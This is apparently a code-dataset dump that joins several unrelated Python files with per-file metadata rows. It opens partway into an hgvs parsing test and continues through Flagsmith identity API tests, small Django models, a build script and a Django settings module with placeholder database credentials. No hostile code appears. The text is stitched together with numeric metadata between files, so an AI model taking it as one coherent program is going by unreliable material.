self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NP_000042.3:p.His1082ArgfsTer2")
self.assertFalse(var.posedit.pos.start < var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
@pytest.mark.quick
class Test_Interval(unittest.TestCase):
def test_Interval(self):
ival = vvhgvs.location.Interval(
vvhgvs.location.BaseOffsetPosition(base=12, offset=+34), vvhgvs.location.BaseOffsetPosition(
base=56, offset=-78))
self.assertEqual(ival.start.base, 12)
self.assertEqual(ival.start.offset, 34)
self.assertEqual(ival.end.base, 56)
self.assertEqual(ival.end.offset, -78)
self.assertEqual(str(ival), "12+34_56-78")
def test_length(self):
ival = vvhgvs.location.Interval(
vvhgvs.location.BaseOffsetPosition(base=12, offset=0), vvhgvs.location.BaseOffsetPosition(base=50, offset=0))
self.assertEqual(ival._length(), 39)
if __name__ == "__main__":
unittest.main()
# <LICENSE>
# Copyright 2018 HGVS Contributors (https://github.com/biocommons/hgvs)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# </LICENSE>
| 41.607306 | 121 | 0.683055 | 1,220 | 9,112 | 5.02623 | 0.156557 | 0.163079 | 0.212003 | 0.146771 | 0.685584 | 0.647913 | 0.630463 | 0.598989 | 0.581376 | 0.568167 | 0 | 0.038684 | 0.182946 | 9,112 | 218 | 122 | 41.798165 | 0.784956 | 0.072432 | 0 | 0.464516 | 0 | 0 | 0.04911 | 0.041163 | 0 | 0 | 0 | 0 | 0.535484 | 1 | 0.096774 | false | 0 | 0.045161 | 0 | 0.167742 | 0.006452 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a447e4aa557dcab9f3ab780011fabc35ec887ea | 270 | py | Python | services/responses/startapp_report_response.py | glaceon2000/interads | 6ad872634a2b1f3d51fb10fcbc37e9211b72ea97 | [
"MIT"
] | null | null | null | services/responses/startapp_report_response.py | glaceon2000/interads | 6ad872634a2b1f3d51fb10fcbc37e9211b72ea97 | [
"MIT"
] | null | null | null | services/responses/startapp_report_response.py | glaceon2000/interads | 6ad872634a2b1f3d51fb10fcbc37e9211b72ea97 | [
"MIT"
] | null | null | null |
class StartAppReportObject:
def __init__(self, result):
self.data = result["data"]
def __eq__(self, other):
if type(other) != type(self):
return False
if self.data == other.data:
return True
return False | 22.5 | 37 | 0.562963 | 30 | 270 | 4.8 | 0.466667 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.337037 | 270 | 12 | 38 | 22.5 | 0.804469 | 0 | 0 | 0.222222 | 0 | 0 | 0.01487 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
dbed6545ce0758e6b2d8e441a9a0c1f8e8aba801 | 440 | py | Python | cycleb.py | pakit/test_recipes | aa5379e4a4ef2d4019f6e8e3a87a06d529e0f910 | [
"BSD-3-Clause"
] | null | null | null | cycleb.py | pakit/test_recipes | aa5379e4a4ef2d4019f6e8e3a87a06d529e0f910 | [
"BSD-3-Clause"
] | null | null | null | cycleb.py | pakit/test_recipes | aa5379e4a4ef2d4019f6e8e3a87a06d529e0f910 | [
"BSD-3-Clause"
] | null | null | null | """ Formula that requires cyclea recipe. """
from pakit import Dummy, Recipe
class Cycleb(Recipe):
"""
Dummy recipe does nothing special but have dependency.
"""
def __init__(self):
super(Cycleb, self).__init__()
self.homepage = 'dummy'
self.repos = {
'stable': Dummy()
}
self.requires = ['cyclea']
def build(self):
pass
def verify(self):
pass
| 20 | 58 | 0.559091 | 46 | 440 | 5.173913 | 0.586957 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.322727 | 440 | 21 | 59 | 20.952381 | 0.798658 | 0.206818 | 0 | 0.153846 | 0 | 0 | 0.052147 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0.153846 | 0.076923 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
dbf157cb289f0dae04177584f511507c6cff78a7 | 23,606 | py | Python | api/environments/identities/tests/test_views.py | dabeeeenster/flagsmith | cda8afc76b1794c3e633fa9959df514194a8a846 | [
"BSD-3-Clause"
] | null | null | null | api/environments/identities/tests/test_views.py | dabeeeenster/flagsmith | cda8afc76b1794c3e633fa9959df514194a8a846 | [
"BSD-3-Clause"
] | null | null | null | api/environments/identities/tests/test_views.py | dabeeeenster/flagsmith | cda8afc76b1794c3e633fa9959df514194a8a846 | [
"BSD-3-Clause"
] | null | null | null | import json
import urllib
from unittest import mock
from unittest.case import TestCase
import pytest
from django.test import override_settings
from django.urls import reverse
from rest_framework import status
from rest_framework.request import Request
from rest_framework.test import APIClient, APITestCase
from environments.identities.helpers import (
get_hashed_percentage_for_object_ids,
)
from environments.identities.models import Identity
from environments.identities.traits.models import Trait
from environments.models import Environment
from features.models import Feature, FeatureSegment, FeatureState
from integrations.amplitude.models import AmplitudeConfiguration
from organisations.models import Organisation, OrganisationRole
from projects.models import Project
from segments import models
from segments.models import Condition, Segment, SegmentRule
from util.tests import Helper
@pytest.mark.django_db
class IdentityTestCase(TestCase):
identifier = "user1"
put_template = '{ "enabled" : "%r" }'
post_template = '{ "feature" : "%s", "enabled" : "%r" }'
feature_states_url = "/api/v1/environments/%s/identities/%s/featurestates/"
feature_states_detail_url = feature_states_url + "%d/"
identities_url = "/api/v1/environments/%s/identities/%s/"
def setUp(self):
self.client = APIClient()
user = Helper.create_ffadminuser()
self.client.force_authenticate(user=user)
self.organisation = Organisation.objects.create(name="Test Org")
user.add_organisation(
self.organisation, OrganisationRole.ADMIN
) # admin to bypass perms
self.project = Project.objects.create(
name="Test project", organisation=self.organisation
)
self.environment = Environment.objects.create(
name="Test Environment", project=self.project
)
self.identity = Identity.objects.create(
identifier=self.identifier, environment=self.environment
)
def test_should_return_identities_list_when_requested(self):
# Given - set up data
# When
response = self.client.get(
self.identities_url % (self.identity.environment.api_key, self.identity.id)
)
# Then
assert response.status_code == status.HTTP_200_OK
def test_should_create_identity_feature_when_post(self):
# Given
feature = Feature.objects.create(name="feature1", project=self.project)
# When
response = self.client.post(
self.feature_states_url
% (self.identity.environment.api_key, self.identity.id),
data=self.post_template % (feature.id, True),
content_type="application/json",
)
# Then
identity_features = self.identity.identity_features
assert response.status_code == status.HTTP_201_CREATED
assert identity_features.count() == 1
def test_should_return_BadRequest_when_duplicate_identityFeature_is_posted(self):
# Given
feature = Feature.objects.create(name="feature2", project=self.project)
# When
initial_response = self.client.post(
self.feature_states_url
% (self.identity.environment.api_key, self.identity.id),
data=self.post_template % (feature.id, True),
content_type="application/json",
)
second_response = self.client.post(
self.feature_states_url
% (self.identity.environment.api_key, self.identity.id),
data=self.post_template % (feature.id, True),
content_type="application/json",
)
# Then
identity_feature = self.identity.identity_features
assert initial_response.status_code == status.HTTP_201_CREATED
assert second_response.status_code == status.HTTP_400_BAD_REQUEST
assert identity_feature.count() == 1
def test_should_change_enabled_state_when_put(self):
# Given
feature = Feature.objects.create(name="feature1", project=self.project)
feature_state = FeatureState.objects.create(
feature=feature,
identity=self.identity,
enabled=False,
environment=self.environment,
)
# When
response = self.client.put(
self.feature_states_detail_url
% (self.identity.environment.api_key, self.identity.id, feature_state.id),
data=self.put_template % True,
content_type="application/json",
)
feature_state.refresh_from_db()
# Then
assert response.status_code == status.HTTP_200_OK
assert feature_state.enabled
def test_should_remove_identity_feature_when_delete(self):
# Given
feature_one = Feature.objects.create(name="feature1", project=self.project)
feature_two = Feature.objects.create(name="feature2", project=self.project)
identity_feature_one = FeatureState.objects.create(
feature=feature_one,
identity=self.identity,
enabled=False,
environment=self.environment,
)
FeatureState.objects.create(
feature=feature_two,
identity=self.identity,
enabled=True,
environment=self.environment,
)
# When
self.client.delete(
self.feature_states_detail_url
% (
self.identity.environment.api_key,
self.identity.id,
identity_feature_one.id,
),
content_type="application/json",
)
# Then
identity_features = FeatureState.objects.filter(identity=self.identity)
assert identity_features.count() == 1
def test_can_search_for_identities(self):
# Given
Identity.objects.create(identifier="user2", environment=self.environment)
base_url = reverse(
"api-v1:environments:environment-identities-list",
args=[self.environment.api_key],
)
url = "%s?q=%s" % (base_url, self.identifier)
# When
res = self.client.get(url)
# Then
assert res.status_code == status.HTTP_200_OK
# and - only identity matching search appears
assert res.json().get("count") == 1
def test_can_search_for_identities_with_exact_match(self):
# Given
identity_to_return = Identity.objects.create(
identifier="1", environment=self.environment
)
Identity.objects.create(identifier="12", environment=self.environment)
Identity.objects.create(identifier="121", environment=self.environment)
base_url = reverse(
"api-v1:environments:environment-identities-list",
args=[self.environment.api_key],
)
url = "%s?%s" % (base_url, urllib.parse.urlencode({"q": '"1"'}))
# When
res = self.client.get(url)
# Then
assert res.status_code == status.HTTP_200_OK
# and - only identity matching search appears
assert res.json().get("count") == 1
assert res.json()["results"][0]["id"] == identity_to_return.id
def test_search_is_case_insensitive(self):
# Given
Identity.objects.create(identifier="user2", environment=self.environment)
base_url = reverse(
"api-v1:environments:environment-identities-list",
args=[self.environment.api_key],
)
url = "%s?q=%s" % (base_url, self.identifier.upper())
# When
res = self.client.get(url)
# Then
assert res.status_code == status.HTTP_200_OK
# and - identity matching search appears
assert res.json().get("count") == 1
def test_no_identities_returned_if_search_matches_none(self):
# Given
base_url = reverse(
"api-v1:environments:environment-identities-list",
args=[self.environment.api_key],
)
url = "%s?q=%s" % (base_url, "some invalid search string")
# When
res = self.client.get(url)
# Then
assert res.status_code == status.HTTP_200_OK
# and
assert res.json().get("count") == 0
def test_search_identities_still_allows_paging(self):
# Given
self._create_n_identities(10)
base_url = reverse(
"api-v1:environments:environment-identities-list",
args=[self.environment.api_key],
)
url = "%s?q=%s&page_size=%s" % (base_url, "user", "10")
res1 = self.client.get(url)
second_page = res1.json().get("next")
# When
res2 = self.client.get(second_page)
# Then
assert res2.status_code == status.HTTP_200_OK
# and
assert res2.json().get("results")
def _create_n_identities(self, n):
for i in range(2, n + 2):
identifier = "user%d" % i
Identity.objects.create(identifier=identifier, environment=self.environment)
def test_can_delete_identity(self):
# Given
url = reverse(
"api-v1:environments:environment-identities-detail",
args=[self.environment.api_key, self.identity.id],
)
# When
res = self.client.delete(url)
# Then
assert res.status_code == status.HTTP_204_NO_CONTENT
# and
assert not Identity.objects.filter(id=self.identity.id).exists()
@pytest.mark.django_db
class SDKIdentitiesTestCase(APITestCase):
def setUp(self) -> None:
self.organisation = Organisation.objects.create(name="Test Org")
self.project = Project.objects.create(
organisation=self.organisation, name="Test Project"
)
self.environment = Environment.objects.create(
project=self.project, name="Test Environment"
)
self.feature_1 = Feature.objects.create(
project=self.project, name="Test Feature 1"
)
self.feature_2 = Feature.objects.create(
project=self.project, name="Test Feature 2"
)
self.identity = Identity.objects.create(
environment=self.environment, identifier="test-identity"
)
self.client.credentials(HTTP_X_ENVIRONMENT_KEY=self.environment.api_key)
def tearDown(self) -> None:
Segment.objects.all().delete()
def test_identities_endpoint_returns_all_feature_states_for_identity_if_feature_not_provided(
self,
):
# Given
base_url = reverse("api-v1:sdk-identities")
url = base_url + "?identifier=" + self.identity.identifier
# When
response = self.client.get(url)
# Then
assert response.status_code == status.HTTP_200_OK
# and
assert len(response.json().get("flags")) == 2
@mock.patch("integrations.amplitude.amplitude.AmplitudeWrapper.identify_user_async")
def test_identities_endpoint_get_all_feature_amplitude_called(
self, mock_amplitude_wrapper
):
# Given
# amplitude configuration for environment
AmplitudeConfiguration.objects.create(
api_key="abc-123", environment=self.environment
)
base_url = reverse("api-v1:sdk-identities")
url = base_url + "?identifier=" + self.identity.identifier
# When
response = self.client.get(url)
# Then
assert response.status_code == status.HTTP_200_OK
# and
assert len(response.json().get("flags")) == 2
# and amplitude identify users should be called
mock_amplitude_wrapper.assert_called()
@mock.patch("integrations.amplitude.amplitude.AmplitudeWrapper.identify_user_async")
def test_identities_endpoint_returns_traits(self, mock_amplitude_wrapper):
# Given
base_url = reverse("api-v1:sdk-identities")
url = base_url + "?identifier=" + self.identity.identifier
trait = Trait.objects.create(
identity=self.identity,
trait_key="trait_key",
value_type="STRING",
string_value="trait_value",
)
# When
response = self.client.get(url)
# Then
assert response.json().get("traits") is not None
# and
assert (
response.json().get("traits")[0].get("trait_value")
== trait.get_trait_value()
)
# and amplitude identify users should not be called
mock_amplitude_wrapper.assert_not_called()
def test_identities_endpoint_returns_single_feature_state_if_feature_provided(self):
# Given
base_url = reverse("api-v1:sdk-identities")
url = (
base_url
+ "?identifier="
+ self.identity.identifier
+ "&feature="
+ self.feature_1.name
)
# When
response = self.client.get(url)
# Then
assert response.status_code == status.HTTP_200_OK
# and
assert response.json().get("feature").get("name") == self.feature_1.name
@mock.patch("integrations.amplitude.amplitude.AmplitudeWrapper.identify_user_async")
def test_identities_endpoint_returns_value_for_segment_if_identity_in_segment(
self, mock_amplitude_wrapper
):
# Given
base_url = reverse("api-v1:sdk-identities")
url = base_url + "?identifier=" + self.identity.identifier
trait_key = "trait_key"
trait_value = "trait_value"
Trait.objects.create(
identity=self.identity,
trait_key=trait_key,
value_type="STRING",
string_value=trait_value,
)
segment = Segment.objects.create(name="Test Segment", project=self.project)
segment_rule = SegmentRule.objects.create(
segment=segment, type=SegmentRule.ALL_RULE
)
Condition.objects.create(
operator="EQUAL", property=trait_key, value=trait_value, rule=segment_rule
)
feature_segment = FeatureSegment.objects.create(
segment=segment,
feature=self.feature_2,
environment=self.environment,
priority=1,
)
FeatureState.objects.create(
feature=self.feature_2,
feature_segment=feature_segment,
environment=self.environment,
enabled=True,
)
# When
response = self.client.get(url)
# Then
assert response.status_code == status.HTTP_200_OK
# and
assert response.json().get("flags")[1].get("enabled")
# and amplitude identify users should not be called
mock_amplitude_wrapper.assert_not_called()
@mock.patch("integrations.amplitude.amplitude.AmplitudeWrapper.identify_user_async")
def test_identities_endpoint_returns_value_for_segment_if_identity_in_segment_and_feature_specified(
self, mock_amplitude_wrapper
):
# Given
base_url = reverse("api-v1:sdk-identities")
url = (
base_url
+ "?identifier="
+ self.identity.identifier
+ "&feature="
+ self.feature_1.name
)
trait_key = "trait_key"
trait_value = "trait_value"
Trait.objects.create(
identity=self.identity,
trait_key=trait_key,
value_type="STRING",
string_value=trait_value,
)
segment = Segment.objects.create(name="Test Segment", project=self.project)
segment_rule = SegmentRule.objects.create(
segment=segment, type=SegmentRule.ALL_RULE
)
Condition.objects.create(
operator="EQUAL", property=trait_key, value=trait_value, rule=segment_rule
)
feature_segment = FeatureSegment.objects.create(
segment=segment,
feature=self.feature_1,
environment=self.environment,
priority=1,
)
FeatureState.objects.create(
feature_segment=feature_segment,
feature=self.feature_1,
environment=self.environment,
enabled=True,
)
# When
response = self.client.get(url)
# Then
assert response.status_code == status.HTTP_200_OK
# and
assert response.json().get("enabled")
# and amplitude identify users should not be called
mock_amplitude_wrapper.assert_not_called()
@mock.patch("integrations.amplitude.amplitude.AmplitudeWrapper.identify_user_async")
def test_identities_endpoint_returns_value_for_segment_if_rule_type_percentage_split_and_identity_in_segment(
self, mock_amplitude_wrapper
):
# Given
base_url = reverse("api-v1:sdk-identities")
url = base_url + "?identifier=" + self.identity.identifier
segment = Segment.objects.create(name="Test Segment", project=self.project)
segment_rule = SegmentRule.objects.create(
segment=segment, type=SegmentRule.ALL_RULE
)
identity_percentage_value = get_hashed_percentage_for_object_ids(
[segment.id, self.identity.id]
)
Condition.objects.create(
operator=models.PERCENTAGE_SPLIT,
value=(identity_percentage_value + (1 - identity_percentage_value) / 2)
* 100.0,
rule=segment_rule,
)
feature_segment = FeatureSegment.objects.create(
segment=segment,
feature=self.feature_1,
environment=self.environment,
priority=1,
)
FeatureState.objects.create(
feature_segment=feature_segment,
feature=self.feature_1,
environment=self.environment,
enabled=True,
)
# When
self.client.credentials(HTTP_X_ENVIRONMENT_KEY=self.environment.api_key)
response = self.client.get(url)
# Then
for flag in response.json()["flags"]:
if flag["feature"]["name"] == self.feature_1.name:
assert flag["enabled"]
# and amplitude identify users should not be called
mock_amplitude_wrapper.assert_not_called()
@mock.patch("integrations.amplitude.amplitude.AmplitudeWrapper.identify_user_async")
def test_identities_endpoint_returns_default_value_if_rule_type_percentage_split_and_identity_not_in_segment(
self, mock_amplitude_wrapper
):
# Given
base_url = reverse("api-v1:sdk-identities")
url = base_url + "?identifier=" + self.identity.identifier
segment = Segment.objects.create(name="Test Segment", project=self.project)
segment_rule = SegmentRule.objects.create(
segment=segment, type=SegmentRule.ALL_RULE
)
identity_percentage_value = get_hashed_percentage_for_object_ids(
[segment.id, self.identity.id]
)
Condition.objects.create(
operator=models.PERCENTAGE_SPLIT,
value=identity_percentage_value / 2,
rule=segment_rule,
)
feature_segment = FeatureSegment.objects.create(
segment=segment,
feature=self.feature_1,
environment=self.environment,
priority=1,
)
FeatureState.objects.create(
feature_segment=feature_segment,
feature=self.feature_1,
environment=self.environment,
enabled=True,
)
# When
self.client.credentials(HTTP_X_ENVIRONMENT_KEY=self.environment.api_key)
response = self.client.get(url)
# Then
assert not response.json().get("flags")[0].get("enabled")
# and amplitude identify users should not be called
mock_amplitude_wrapper.assert_not_called()
def test_post_identify_with_persistence(self):
# Given
url = reverse("api-v1:sdk-identities")
# a payload for an identity with 2 traits
data = {
"identifier": self.identity.identifier,
"traits": [
{"trait_key": "my_trait", "trait_value": 123},
{"trait_key": "my_other_trait", "trait_value": "a value"},
],
}
# When
# we identify that user by posting the above payload
self.client.credentials(HTTP_X_ENVIRONMENT_KEY=self.environment.api_key)
response = self.client.post(
url, data=json.dumps(data), content_type="application/json"
)
# Then
# we get everything we expect in the response
response_json = response.json()
assert response_json["flags"]
assert response_json["traits"]
# and the traits ARE persisted
assert self.identity.identity_traits.count() == 2
def test_post_identify_without_persistence(self):
# Given
url = reverse("api-v1:sdk-identities")
# an organisation configured to not persist traits
self.organisation.persist_trait_data = False
self.organisation.save()
# and a payload for an identity with 2 traits
data = {
"identifier": self.identity.identifier,
"traits": [
{"trait_key": "my_trait", "trait_value": 123},
{"trait_key": "my_other_trait", "trait_value": "a value"},
],
}
# When
# we identify that user by posting the above payload
self.client.credentials(HTTP_X_ENVIRONMENT_KEY=self.environment.api_key)
response = self.client.post(
url, data=json.dumps(data), content_type="application/json"
)
# Then
# we get everything we expect in the response
response_json = response.json()
assert response_json["flags"]
assert response_json["traits"]
# and the traits ARE NOT persisted
assert self.identity.identity_traits.count() == 0
@override_settings(EDGE_API_URL="http://localhost")
@mock.patch("environments.identities.views.forward_identity_request")
def test_post_identities_calls_forward_identity_request_with_correct_arguments(
self, mocked_forward_identity_request
):
# Given
url = reverse("api-v1:sdk-identities")
data = {
"identifier": self.identity.identifier,
"traits": [
{"trait_key": "my_trait", "trait_value": 123},
{"trait_key": "my_other_trait", "trait_value": "a value"},
],
}
# When
self.client.post(url, data=json.dumps(data), content_type="application/json")
# Then
args, kwargs = mocked_forward_identity_request.call_args_list[0]
assert kwargs == {}
assert isinstance(args[0], Request)
assert args[0].data == data
assert args[1] == self.environment.project.id
@override_settings(EDGE_API_URL="http://localhost")
@mock.patch("environments.identities.views.forward_identity_request")
def test_get_identities_calls_forward_identity_request_with_correct_arguments(
self, mocked_forward_identity_request
):
# Given
base_url = reverse("api-v1:sdk-identities")
url = base_url + "?identifier=" + self.identity.identifier
# When
self.client.get(url)
# Then
args, kwargs = mocked_forward_identity_request.call_args_list[0]
assert kwargs == {}
assert isinstance(args[0], Request)
assert args[1] == self.environment.project.id
| 34.112717 | 113 | 0.629882 | 2,559 | 23,606 | 5.589293 | 0.097304 | 0.043627 | 0.036356 | 0.018877 | 0.775012 | 0.721527 | 0.707754 | 0.662798 | 0.623156 | 0.587429 | 0 | 0.009148 | 0.272981 | 23,606 | 691 | 114 | 34.162084 | 0.824263 | 0.05452 | 0 | 0.559006 | 0 | 0 | 0.104185 | 0.051665 | 0 | 0 | 0 | 0 | 0.113872 | 1 | 0.055901 | false | 0 | 0.043478 | 0 | 0.115942 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
dbf5e8e1673361cdf8d898d6886a74a5e8b951c6 | 472 | py | Python | ratings/tests/models.py | Barolina/djangosnippets.org | 2b445764be4fd6d48371dee0486effa8687070d8 | [
"BSD-3-Clause"
] | null | null | null | ratings/tests/models.py | Barolina/djangosnippets.org | 2b445764be4fd6d48371dee0486effa8687070d8 | [
"BSD-3-Clause"
] | 1 | 2022-03-12T01:06:51.000Z | 2022-03-12T01:06:51.000Z | ratings/tests/models.py | Barolina/djangosnippets.org | 2b445764be4fd6d48371dee0486effa8687070d8 | [
"BSD-3-Clause"
] | null | null | null | from django.db import models
from ..models import RatedItemBase, Ratings
class Food(models.Model):
name = models.CharField(max_length=50)
ratings = Ratings()
def __str__(self):
return self.name
class BeverageRating(RatedItemBase):
content_object = models.ForeignKey('Beverage')
class Beverage(models.Model):
name = models.CharField(max_length=50)
ratings = Ratings(BeverageRating)
def __str__(self):
return self.name
| 18.153846 | 50 | 0.707627 | 55 | 472 | 5.872727 | 0.436364 | 0.068111 | 0.092879 | 0.130031 | 0.489164 | 0.489164 | 0.340557 | 0.340557 | 0.340557 | 0.340557 | 0 | 0.010554 | 0.197034 | 472 | 25 | 51 | 18.88 | 0.841689 | 0 | 0 | 0.428571 | 0 | 0 | 0.016949 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0.142857 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
e013d3f7c3c05df9d72856b4604cd3f06879f997 | 79 | py | Python | utility/base64/ucube.py | jinlongliu/AliOS-Things | ce051172a775f987183e7aca88bb6f3b809ea7b0 | [
"Apache-2.0"
] | 30 | 2018-05-21T18:58:03.000Z | 2020-11-30T03:44:10.000Z | utility/base64/ucube.py | IamBaoMouMou/AliOS-Things | 195a9160b871b3d78de6f8cf6c2ab09a71977527 | [
"Apache-2.0"
] | 3 | 2018-12-17T13:06:46.000Z | 2018-12-28T01:40:59.000Z | utility/base64/ucube.py | IamBaoMouMou/AliOS-Things | 195a9160b871b3d78de6f8cf6c2ab09a71977527 | [
"Apache-2.0"
] | 16 | 2018-05-15T08:11:12.000Z | 2022-03-20T05:23:15.000Z | src = Split('''
base64.c
''')
component = aos_component('base64', src) | 15.8 | 40 | 0.582278 | 9 | 79 | 5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 0.21519 | 79 | 5 | 40 | 15.8 | 0.66129 | 0 | 0 | 0 | 0 | 0 | 0.263158 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e01deab92182bb405c91fec1268db70de4f57b17 | 4,380 | py | Python | app/app/settings.py | cosmos-sajal/recipe-app-api | 50541bf5d1e4bad3feea3ac749f0838a92ce647d | [
"MIT"
] | null | null | null | app/app/settings.py | cosmos-sajal/recipe-app-api | 50541bf5d1e4bad3feea3ac749f0838a92ce647d | [
"MIT"
] | null | null | null | app/app/settings.py | cosmos-sajal/recipe-app-api | 50541bf5d1e4bad3feea3ac749f0838a92ce647d | [
"MIT"
] | null | null | null | """
Django settings for app project.
Generated by 'django-admin startproject' using Django 3.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os, datetime
from datetime import timedelta
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework_simplejwt.token_blacklist',
'core',
'user',
'recipe'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'HOST': 'DB_HOST',
'NAME': 'DB_NAME',
'USER': 'DB_USER',
'PASSWORD': 'DB_PASSWORD',
}
}
# Redis Cache
CACHES = {
'default': {
'BACKEND': "django_redis.cache.RedisCache",
'LOCATION': 'REDIS_LOCATION',
'OPTIONS': {
'CLIENT_CLASS': 'django_redis.client.DefaultClient'
}
}
}
CACHE_TTL = 60 * 15
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# JWT settings
# REST_FRAMEWORK = {
# 'DEFAULT_AUTHENTICATION_CLASSES': (
# 'rest_framework_simplejwt.authentication.JWTAuthentication'
# )
# }
SIMPLE_JWT = {
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=365),
'ROTATE_REFRESH_TOKENS': True,
'BLACKLIST_AFTER_ROTATION': True,
'ALGORITHM': 'HS256',
'SIGNING_KEY': 'KEY',
'VERIFYING_KEY': None,
'AUDIENCE': None,
'ISSUER': None,
'AUTH_HEADER_TYPES': ('Bearer',),
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),
'TOKEN_TYPE_CLAIM': 'token_type',
'JTI_CLAIM': 'jti',
'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),
}
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'core.User'
EXPIRING_TOKEN_LIFESPAN = datetime.timedelta(seconds=20)
